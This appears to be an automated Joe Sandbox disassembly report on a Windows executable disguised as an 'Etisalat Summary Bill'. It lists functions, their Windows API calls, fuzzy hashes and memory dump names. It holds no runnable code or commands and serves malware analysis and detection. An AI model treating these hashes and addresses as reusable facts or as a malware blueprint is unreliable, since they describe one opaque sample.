CreateThread.KERNEL32(00000000,?,008CCFF9,00000000,00000004,00000000), ref: 008CD218
GetLastError.KERNEL32 ref: 008CD224
__dosmaperr.LIBCMT ref: 008CD22B
ResumeThread.KERNEL32(00000000), ref: 008CD249

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 54635bd63a5abd0069cc75af25a92ca9cea6fd3664268439ae8283cada0bb15a
Instruction ID: a9fcaae43ff0d3cdc999326d1d977147e77532f5ab25e21b31a0b5f397f75cc9
Opcode Fuzzy Hash: 54635bd63a5abd0069cc75af25a92ca9cea6fd3664268439ae8283cada0bb15a
Instruction Fuzzy Hash: 3C01C476415608BBD7116BA9DC09FAA7A79FF81330F10422EF925D21D1CB71D901D7A1

Function 008A600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008A604C
GetStockObject.GDI32(00000011), ref: 008A6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 008A606A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 32ce4b28c8f24cea31a3f38d0fdb8055ce9d0d8fb566ce961dab533aec0f7e6c
Instruction ID: 6436c48961b5fa6d3af1a0b09e0e869706eb48340f1e72fc337e8e760016581d
Opcode Fuzzy Hash: 32ce4b28c8f24cea31a3f38d0fdb8055ce9d0d8fb566ce961dab533aec0f7e6c
Instruction Fuzzy Hash: 4011A1B3105909BFEF124FA49C44EEA7B69FF19364F040101FA15A2020D7329CA0EF90

Function 008C3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 008C3B56

Part of subcall function 008C3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 008C3AD2
Part of subcall function 008C3AA3: ___AdjustPointer.LIBCMT ref: 008C3AED

_UnwindNestedFrames.LIBCMT ref: 008C3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 008C3B7C
CallCatchBlock.LIBVCRUNTIME ref: 008C3BA4

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 1cc7737da65ab2aa85d9baf5fd505c2770a5766a9c5c64dbab58bbef61d863cc
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 9E01E932100149BBDF125E99CC46EEB7B7DFF58764F048018FE48A6121C732E962DBA1

Function 008D3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008A13C6,00000000,00000000,?,008D301A,008A13C6,00000000,00000000,00000000,?,008D328B,00000006,FlsSetValue), ref: 008D30A5
GetLastError.KERNEL32(?,008D301A,008A13C6,00000000,00000000,00000000,?,008D328B,00000006,FlsSetValue,00942290,FlsSetValue,00000000,00000364,?,008D2E46), ref: 008D30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008D301A,008A13C6,00000000,00000000,00000000,?,008D328B,00000006,FlsSetValue,00942290,FlsSetValue,00000000), ref: 008D30BF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 722afac2ef4c2b2cd9ca902657cfe287248dfe5c8056033fbd320d7b153c5724
Instruction ID: 30ba5eb35ab83f3037ba43c39225607176545f0ca76a4a4cc1a6cfdf327ee006
Opcode Fuzzy Hash: 722afac2ef4c2b2cd9ca902657cfe287248dfe5c8056033fbd320d7b153c5724
Instruction Fuzzy Hash: 7E01F772319A26ABCB314B78AC449577B98FF45B61B140721F915F3340C721DD01CBE1

Function 00907464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0090747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00907497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009074AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009074CA

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 19a0812e4e19fb69c30d7397543eb8d5d42d0043da7f1c7f7864dc273bea441d
Instruction ID: fce25cdf612cec4a581b4902131027a704ed5d8dd6f5979bf8d262cffc0a861e
Opcode Fuzzy Hash: 19a0812e4e19fb69c30d7397543eb8d5d42d0043da7f1c7f7864dc273bea441d
Instruction Fuzzy Hash: 9D11A1B5A09714DFE7208F94DC08B92BBFDEB00B10F108969A656D61A1D7B4F904DF60

Function 0090B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0090ACD3,?,00008000), ref: 0090B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0090ACD3,?,00008000), ref: 0090B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0090ACD3,?,00008000), ref: 0090B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0090ACD3,?,00008000), ref: 0090B126

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d110ef8cca97b1c818562756d85c4f222bd1de6261fa2528eec7debfc7e57004
Instruction ID: f80aebaf962f2ac4ee49fac5f32e885cea9a3c94e1dee395cd009f466a4ce5fd
Opcode Fuzzy Hash: d110ef8cca97b1c818562756d85c4f222bd1de6261fa2528eec7debfc7e57004
Instruction Fuzzy Hash: C8116D71C0992DEFCF00AFE4E9A8AEEBBB8FF09711F114485D941B2285CB3456609B91

Function 00902DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00902DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00902DD6
GetCurrentThreadId.KERNEL32 ref: 00902DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00902DE4

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 26970910dd4b66e7c48fef952df71823fa1aeded70824ca44c0f349edfa02550
Instruction ID: 0e57d3950f306960e5e50f2d27ef6328ffadcd224a8212486e9fc908c4859936
Opcode Fuzzy Hash: 26970910dd4b66e7c48fef952df71823fa1aeded70824ca44c0f349edfa02550
Instruction Fuzzy Hash: 98E092B1119B24BBDB201BB29C0EFEB3E6CEF42BA5F000015F105E10C09AA4CC40EBB0

Function 00938863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 008B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008B9693
Part of subcall function 008B9639: SelectObject.GDI32(?,00000000), ref: 008B96A2
Part of subcall function 008B9639: BeginPath.GDI32(?), ref: 008B96B9
Part of subcall function 008B9639: SelectObject.GDI32(?,00000000), ref: 008B96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00938887
LineTo.GDI32(?,?,?), ref: 00938894
EndPath.GDI32(?), ref: 009388A4
StrokePath.GDI32(?), ref: 009388B2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 3a72b3eb3150806a66a3a2649eabce9f88266d674878f1cd504835e3a0083e13
Instruction ID: ba58d64036fb9ded1404524c19a286c24ad7a67817312b3eea709f9979491a07
Opcode Fuzzy Hash: 3a72b3eb3150806a66a3a2649eabce9f88266d674878f1cd504835e3a0083e13
Instruction Fuzzy Hash: 15F03A36059A58FBDB125F98AC09FCA3B69AF06310F048000FB12750E2C7755551EFA5

Function 008B98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008B98CC
SetTextColor.GDI32(?,?), ref: 008B98D6
SetBkMode.GDI32(?,00000001), ref: 008B98E9
GetStockObject.GDI32(00000005), ref: 008B98F1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 0a257fbeb738324487c04047a366ddcf903866bf388eadc0b747d51a9907e990
Instruction ID: e0a05e632155c53d31e7cf927a45c6b1d0f4646b7f24ba44e8f136c3590b5804
Opcode Fuzzy Hash: 0a257fbeb738324487c04047a366ddcf903866bf388eadc0b747d51a9907e990
Instruction Fuzzy Hash: 0AE0657125C644AAEB215B74AC09BE83F10FB11335F048219F7F5A40E1C3714640AF10

Function 0090162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00901634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009011D9), ref: 0090163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009011D9), ref: 00901648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009011D9), ref: 0090164F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5101f121087f3586a8df58ba3d9bb06ee3f4065d67850ac05fb284754dacea7a
Instruction ID: 6b16eedb30e3fdd3c9a26028d7e06ccbc5de24270477d9c7dee27a3048e9fcd9
Opcode Fuzzy Hash: 5101f121087f3586a8df58ba3d9bb06ee3f4065d67850ac05fb284754dacea7a
Instruction Fuzzy Hash: 2DE08CB2616211EBDB201FA0AE0DB873B7CAF44792F148808F245E9080E7348444DF60

Function 008FD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 008FD858
GetDC.USER32(00000000), ref: 008FD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008FD882
ReleaseDC.USER32(?), ref: 008FD8A3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c7f674f7d920f50440bad140d8b92d462d015fd7473a5c3849a0a9d17d7df94b
Instruction ID: c4776e625d0abbfb80b4742536761044f75ca752235ba73b966d78bffa521b33
Opcode Fuzzy Hash: c7f674f7d920f50440bad140d8b92d462d015fd7473a5c3849a0a9d17d7df94b
Instruction Fuzzy Hash: E6E01AB1814A09EFCF41AFA0D80D66DBBB2FB08314F108419F946F7260CB389901AF40

Function 008FD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 008FD86C
GetDC.USER32(00000000), ref: 008FD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008FD882
ReleaseDC.USER32(?), ref: 008FD8A3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e95fe4faa5c8bbc87fd7e7e6e466b74c6b13f5e8d1b86834883bc45a13db3961
Instruction ID: 078104afb3e4e1f5e590e0643fa2d63719a90e5e17bc3341dd1018b797d0aff8
Opcode Fuzzy Hash: e95fe4faa5c8bbc87fd7e7e6e466b74c6b13f5e8d1b86834883bc45a13db3961
Instruction Fuzzy Hash: E9E01AB1814A05EFCF40AFA0D80D66DBBB1FB08314F108008F846F7260CB385901AF40

Function 00914D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 008A7620: _wcslen.LIBCMT ref: 008A7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00914ED4

Strings

*, xrefs: 00914E10
LPT, xrefs: 00914DFB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 16172a1dead3841fcbb1e8fd23739e55f383d54a028ef5bc32784c3abc16ee49
Instruction ID: b272a6b41b82a6d0dbde330f9bb70f19709c0da9b97ad02b2c6dc9c17333cecd
Opcode Fuzzy Hash: 16172a1dead3841fcbb1e8fd23739e55f383d54a028ef5bc32784c3abc16ee49
Instruction Fuzzy Hash: 1B915F75A002089FDB14DF58C484EAABBF5FF49304F198099E40A9F7A2D735ED86CB91

Function 008BE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 008BE1B1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3b713f8239acf5b0ec5e05e9bbaa5f42f53f9714275492eb3a3c00f363a49d46
Instruction ID: d9fe28c4567c76b24c56d7d09e06051133b810b490f46bf119ceb01a72aec80e
Opcode Fuzzy Hash: 3b713f8239acf5b0ec5e05e9bbaa5f42f53f9714275492eb3a3c00f363a49d46
Instruction Fuzzy Hash: 0251117550424ADFEB25EF38C081AFA7BA4FF16310F244065F991DB2E0D6349D42CBA1

Function 008BF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 008BF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 008BF2BB

Strings

@, xrefs: 008BF2AF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: d90f4c6d8b719c1c302abf5a751ea0b0799162a2dd96ab09ac42b78d26ec0a44
Instruction ID: c4b46e7de06069fc9c88f7d9b32ecc776d4c2322e4018914b8886e1a4ff00966
Opcode Fuzzy Hash: d90f4c6d8b719c1c302abf5a751ea0b0799162a2dd96ab09ac42b78d26ec0a44
Instruction Fuzzy Hash: 3E51277141C7449FE320AF15DC86BABBBF8FB85300F81885DF29981195EB709529CB67

Function 00925745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009257E0
_wcslen.LIBCMT ref: 009257EC

Strings

CALLARGARRAY, xrefs: 009257E6, 009257EB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 4bbe71ab331a8e92fa2a7b2575715704c5c166b2ae834ad9afbc58f69f028b26
Instruction ID: d5aa725d50d6b4e1fa7ca365c580dd8d3d0a0f4950ad1dd1baf8270d506af6c3
Opcode Fuzzy Hash: 4bbe71ab331a8e92fa2a7b2575715704c5c166b2ae834ad9afbc58f69f028b26
Instruction Fuzzy Hash: C1419F71E002199FCB14DFA8D8819BEBBF9FF59324F114029E505AB2A5E7749D81CB90

Function 0091D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0091D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0091D13A

Strings

|, xrefs: 0091D10B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 29e85b1ec90f36ba0a57b19bc12d93195b1d2a264720d416d4294bae3b338791
Instruction ID: 25b7fc70911911ce7adb75f622289336887e29e50753fe52c89c1f1582dd90c7
Opcode Fuzzy Hash: 29e85b1ec90f36ba0a57b19bc12d93195b1d2a264720d416d4294bae3b338791
Instruction Fuzzy Hash: 4B314C71D01219ABDF15EFE4CC85AEEBFB9FF05300F100019F815A6165E735AA56CB51

Function 0093356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00933621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0093365C

Strings

static, xrefs: 009335BC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
